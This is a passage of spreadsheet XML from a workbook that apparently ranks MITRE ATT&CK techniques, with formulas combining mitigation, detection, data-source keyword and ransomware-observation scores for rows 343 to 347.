      <c r="AF343" s="25" t="str" cm="1">
        <f t="array" ref="AF343">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC343)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG343" s="25">
        <f>IF(AF343="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH343" s="25" t="str" cm="1">
        <f t="array" ref="AH343">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC343)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI343" s="25">
        <f>IF(AH343="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ343" s="25" t="str" cm="1">
        <f t="array" ref="AJ343">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC343)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK343" s="25">
        <f>IF(AJ343="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL343" s="25" t="str" cm="1">
        <f t="array" ref="AL343">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC343)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM343" s="25">
        <f>IF(AL343="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN343" s="52">
        <v>1</v>
      </c>
      <c r="AO343" s="51">
        <v>1</v>
      </c>
      <c r="AP343" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.8129523809523811E-2</v>
      </c>
      <c r="AQ343" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>8.2653968253968271E-2</v>
      </c>
      <c r="AR343" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>8.2653968253968271E-2</v>
      </c>
      <c r="AS343" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT343" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU34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44" spans="1:47" ht="48">
      <c r="A344" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.0579047619047613E-2</v>
      </c>
      <c r="B344" s="25">
        <f>SUM(H344,M344,V344)*(1+SUM(AE344,AG344,AI344,AK344,AM344))</f>
        <v>0.30579047619047617</v>
      </c>
      <c r="C344" s="25" t="s">
        <v>1384</v>
      </c>
      <c r="D344" s="25" t="s">
        <v>1189</v>
      </c>
      <c r="E344" s="25" t="s">
        <v>1385</v>
      </c>
      <c r="F344" s="51">
        <v>1</v>
      </c>
      <c r="G344" s="51">
        <v>1</v>
      </c>
      <c r="H344" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I344">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J344">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K344">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L344">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M344" s="25">
        <v>0</v>
      </c>
      <c r="N344" s="51">
        <v>1</v>
      </c>
      <c r="O344" s="51">
        <v>0</v>
      </c>
      <c r="P344" s="51">
        <v>0</v>
      </c>
      <c r="Q344" s="51">
        <v>0</v>
      </c>
      <c r="R344" s="52" t="s">
        <v>511</v>
      </c>
      <c r="S344" s="51">
        <v>9</v>
      </c>
      <c r="T344" s="52" t="s">
        <v>1386</v>
      </c>
      <c r="U344" s="51">
        <v>3</v>
      </c>
      <c r="V344" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.11904761904761904</v>
      </c>
      <c r="W344">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>12</v>
      </c>
      <c r="X344">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.21818181818181817</v>
      </c>
      <c r="Y344">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.21818181818181817</v>
      </c>
      <c r="Z344">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>1</v>
      </c>
      <c r="AA344">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.01</v>
      </c>
      <c r="AB344">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.01</v>
      </c>
      <c r="AC344" s="29" t="s">
        <v>1387</v>
      </c>
      <c r="AD344" s="25" t="str" cm="1">
        <f t="array" ref="AD344">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC344)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE344" s="25">
        <f>IF(AD344="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF344" s="25" t="str" cm="1">
        <f t="array" ref="AF344">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC344)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG344" s="25">
        <f>IF(AF344="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH344" s="25" t="str" cm="1">
        <f t="array" ref="AH344">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC344)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI344" s="25">
        <f>IF(AH344="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ344" s="25" t="str" cm="1">
        <f t="array" ref="AJ344">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC344)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AK344" s="25">
        <f>IF(AJ344="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AL344" s="25" t="str" cm="1">
        <f t="array" ref="AL344">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC344)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM344" s="25">
        <f>IF(AL344="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN344" s="52">
        <v>0</v>
      </c>
      <c r="AO344" s="51">
        <v>0</v>
      </c>
      <c r="AP344" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.0579047619047613E-2</v>
      </c>
      <c r="AQ344" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.10193015873015872</v>
      </c>
      <c r="AR344" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.10193015873015872</v>
      </c>
      <c r="AS344" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT344" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU34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45" spans="1:47">
      <c r="A345" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.6241904761904761E-2</v>
      </c>
      <c r="B345" s="25">
        <f>SUM(H345,M345,V345)*(1+SUM(AE345,AG345,AI345,AK345,AM345))</f>
        <v>0.26241904761904761</v>
      </c>
      <c r="C345" s="25" t="s">
        <v>1388</v>
      </c>
      <c r="D345" s="25" t="s">
        <v>365</v>
      </c>
      <c r="E345" s="25" t="s">
        <v>1389</v>
      </c>
      <c r="F345" s="51">
        <v>1</v>
      </c>
      <c r="G345" s="51">
        <v>1</v>
      </c>
      <c r="H345" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I345">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J345">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K345">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L345">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M345" s="25">
        <v>0</v>
      </c>
      <c r="N345" s="51">
        <v>0</v>
      </c>
      <c r="O345" s="51">
        <v>1</v>
      </c>
      <c r="P345" s="51">
        <v>0</v>
      </c>
      <c r="Q345" s="51">
        <v>0</v>
      </c>
      <c r="R345" s="52" t="s">
        <v>1390</v>
      </c>
      <c r="S345" s="51">
        <v>5</v>
      </c>
      <c r="T345" s="51" t="s">
        <v>1279</v>
      </c>
      <c r="U345" s="51">
        <v>7</v>
      </c>
      <c r="V345" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.11904761904761904</v>
      </c>
      <c r="W345">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>12</v>
      </c>
      <c r="X345">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.21818181818181817</v>
      </c>
      <c r="Y345">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.21818181818181817</v>
      </c>
      <c r="Z345">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>1</v>
      </c>
      <c r="AA345">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.01</v>
      </c>
      <c r="AB345">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.01</v>
      </c>
      <c r="AC345" s="29" t="s">
        <v>97</v>
      </c>
      <c r="AD345" s="25" t="str" cm="1">
        <f t="array" ref="AD345">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC345)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE345" s="25">
        <f>IF(AD345="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF345" s="25" t="str" cm="1">
        <f t="array" ref="AF345">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC345)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG345" s="25">
        <f>IF(AF345="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH345" s="25" t="str" cm="1">
        <f t="array" ref="AH345">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC345)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI345" s="25">
        <f>IF(AH345="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ345" s="25" t="str" cm="1">
        <f t="array" ref="AJ345">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC345)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK345" s="25">
        <f>IF(AJ345="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL345" s="25" t="str" cm="1">
        <f t="array" ref="AL345">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC345)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM345" s="25">
        <f>IF(AL345="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN345" s="59">
        <v>0</v>
      </c>
      <c r="AO345" s="51">
        <v>0</v>
      </c>
      <c r="AP345" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.6241904761904761E-2</v>
      </c>
      <c r="AQ345" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>8.7473015873015869E-2</v>
      </c>
      <c r="AR345" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>8.7473015873015869E-2</v>
      </c>
      <c r="AS345" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT345" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU34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46" spans="1:47" ht="32.1">
      <c r="A346" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.3599047619047617E-2</v>
      </c>
      <c r="B346" s="25">
        <f>SUM(H346,M346,V346)*(1+SUM(AE346,AG346,AI346,AK346,AM346))</f>
        <v>0.23599047619047619</v>
      </c>
      <c r="C346" s="25" t="s">
        <v>1391</v>
      </c>
      <c r="D346" s="25" t="s">
        <v>1346</v>
      </c>
      <c r="E346" s="25" t="s">
        <v>1392</v>
      </c>
      <c r="F346" s="51">
        <v>1</v>
      </c>
      <c r="G346" s="51">
        <v>0</v>
      </c>
      <c r="H346" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I346">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J346">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K346">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0</v>
      </c>
      <c r="L346">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="M346" s="25">
        <v>0</v>
      </c>
      <c r="N346" s="51">
        <v>0</v>
      </c>
      <c r="O346" s="51">
        <v>1</v>
      </c>
      <c r="P346" s="51">
        <v>0</v>
      </c>
      <c r="Q346" s="51">
        <v>0</v>
      </c>
      <c r="R346" s="52" t="s">
        <v>1347</v>
      </c>
      <c r="S346" s="51">
        <v>3</v>
      </c>
      <c r="T346" s="52" t="s">
        <v>1348</v>
      </c>
      <c r="U346" s="51">
        <v>9</v>
      </c>
      <c r="V346" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.11904761904761904</v>
      </c>
      <c r="W346">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>12</v>
      </c>
      <c r="X346">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.21818181818181817</v>
      </c>
      <c r="Y346">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.21818181818181817</v>
      </c>
      <c r="Z346">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>1</v>
      </c>
      <c r="AA346">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.01</v>
      </c>
      <c r="AB346">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.01</v>
      </c>
      <c r="AC346" s="29" t="s">
        <v>1393</v>
      </c>
      <c r="AD346" s="25" t="str" cm="1">
        <f t="array" ref="AD346">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC346)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE346" s="25">
        <f>IF(AD346="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF346" s="25" t="str" cm="1">
        <f t="array" ref="AF346">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC346)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG346" s="25">
        <f>IF(AF346="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH346" s="25" t="str" cm="1">
        <f t="array" ref="AH346">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC346)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI346" s="25">
        <f>IF(AH346="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ346" s="25" t="str" cm="1">
        <f t="array" ref="AJ346">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC346)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AK346" s="25">
        <f>IF(AJ346="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AL346" s="25" t="str" cm="1">
        <f t="array" ref="AL346">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC346)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM346" s="25">
        <f>IF(AL346="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN346" s="52">
        <v>0</v>
      </c>
      <c r="AO346" s="51">
        <v>0</v>
      </c>
      <c r="AP346" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.3599047619047617E-2</v>
      </c>
      <c r="AQ346" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>7.866349206349206E-2</v>
      </c>
      <c r="AR346" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>7.866349206349206E-2</v>
      </c>
      <c r="AS346" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT346" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU34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47" spans="1:47">
      <c r="A347" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>9.5166666666666677E-2</v>
      </c>
      <c r="B347" s="25">
        <f>SUM(H347,M347,V347)*(1+SUM(AE347,AG347,AI347,AK347,AM347))</f>
        <v>0.28500000000000003</v>
      </c>
      <c r="C347" s="25" t="s">
        <v>1394</v>
      </c>
      <c r="D347" s="25" t="s">
        <v>170</v>
      </c>
      <c r="E347" s="25" t="s">
        <v>1395</v>
      </c>
      <c r="F347" s="51">
        <v>1</v>
      </c>
      <c r="G347" s="51">
        <v>1</v>
      </c>
      <c r="H347" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I347">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J347">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K347">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L347">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M347" s="25">
        <v>0</v>
      </c>
      <c r="N347" s="51">
        <v>0</v>
      </c>
      <c r="O347" s="51">
        <v>0</v>
      </c>
      <c r="P347" s="51">
        <v>0</v>
      </c>
      <c r="Q347" s="51">
        <v>0</v>
      </c>
      <c r="R347" s="51">
        <v>2.5</v>
      </c>
      <c r="S347" s="51">
        <v>1</v>
      </c>
      <c r="T347" s="52" t="s">
        <v>1396</v>
      </c>
      <c r="U347" s="51">
        <v>11</v>
      </c>
      <c r="V347" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.11428571428571428</v>
      </c>
      <c r="W347">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>12</v>
      </c>
      <c r="X347">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.21818181818181817</v>
      </c>
      <c r="Y347">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.21818181818181817</v>
      </c>
      <c r="Z347">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA347">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB347">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC347" s="29" t="s">
        <v>399</v>
      </c>
      <c r="AD347" s="25" t="str" cm="1">
        <f t="array" ref="AD347">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC347)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE347" s="25">
        <f>IF(AD347="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF347" s="25" t="str" cm="1">
        <f t="array" ref="AF347">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC347)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG347" s="25">
        <f>IF(AF347="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH347" s="25" t="str" cm="1">
        <f t="array" ref="AH347">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC347)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI347" s="25">
        <f>IF(AH347="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ347" s="25" t="str" cm="1">
        <f t="array" ref="AJ347">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC347)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK347" s="25">
        <f>IF(AJ347="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL347" s="25" t="str" cm="1">
        <f t="array" ref="AL347">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC347)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM347" s="25">
        <f>IF(AL347="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN347" s="60">
        <v>2</v>
      </c>
      <c r="AO347" s="51">
        <v>1</v>
      </c>
      <c r="AP347" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>9.5166666666666677E-2</v>
      </c>
      <c r="AQ347" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>9.5000000000000015E-2</v>
      </c>
      <c r="AR347" s="25">
